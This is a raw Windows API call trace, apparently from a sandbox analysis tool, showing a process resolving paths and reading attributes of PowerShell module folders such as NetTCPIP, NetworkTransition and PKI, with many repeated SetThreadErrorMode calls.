	[0058.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b
	[0058.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\", lpFilePart=0x0) returned 0x3c
	[0058.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b
	[0058.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.889] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b
	[0058.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\", lpFilePart=0x0) returned 0x3c
	[0058.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.889] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1")) returned 0x20
	[0058.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c
	[0058.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\", lpFilePart=0x0) returned 0x4d
	[0058.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c
	[0058.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\", lpFilePart=0x0) returned 0x4d
	[0058.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c
	[0058.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.891] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c
	[0058.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\", lpFilePart=0x0) returned 0x4d
	[0058.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.891] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1")) returned 0x20
	[0058.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47
	[0058.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\", lpFilePart=0x0) returned 0x48
	[0058.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47
	[0058.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\", lpFilePart=0x0) returned 0x48
	[0058.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47
	[0058.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.893] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47
	[0058.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\", lpFilePart=0x0) returned 0x48
	[0058.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.894] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager\\networkswitchmanager.psd1")) returned 0x20
	[0058.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", lpFilePart=0x0) returned 0x44
	[0058.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", lpFilePart=0x0) returned 0x44
	[0058.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\", lpFilePart=0x0) returned 0x45
	[0058.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.895] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0058.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", lpFilePart=0x0) returned 0x44
	[0058.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\", lpFilePart=0x0) returned 0x45
	[0058.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.896] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition\\networktransition.psd1")) returned 0x20
	[0058.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", lpFilePart=0x0) returned 0x3d
	[0058.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", lpFilePart=0x0) returned 0x3d
	[0058.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\", lpFilePart=0x0) returned 0x3e
	[0058.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", nBufferLength=0x105, lpBuffer=0x184c18cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", lpFilePart=0x0) returned 0x3d
	[0058.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.897] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice"), fInfoLevelId=0x0, lpFileInformation=0x184c18d470 | out: lpFileInformation=0x184c18d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0058.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", lpFilePart=0x0) returned 0x3d
	[0058.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\", lpFilePart=0x0) returned 0x3e
	[0058.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.897] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice\\pcsvdevice.psd1")) returned 0x20
	[0058.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", nBufferLength=0x105, lpBuffer=0x184c18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", lpFilePart=0x0) returned 0x36
	[0058.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\", nBufferLength=0x105, lpBuffer=0x184c18cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\", lpFilePart=0x0) returned 0x37
	[0058.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
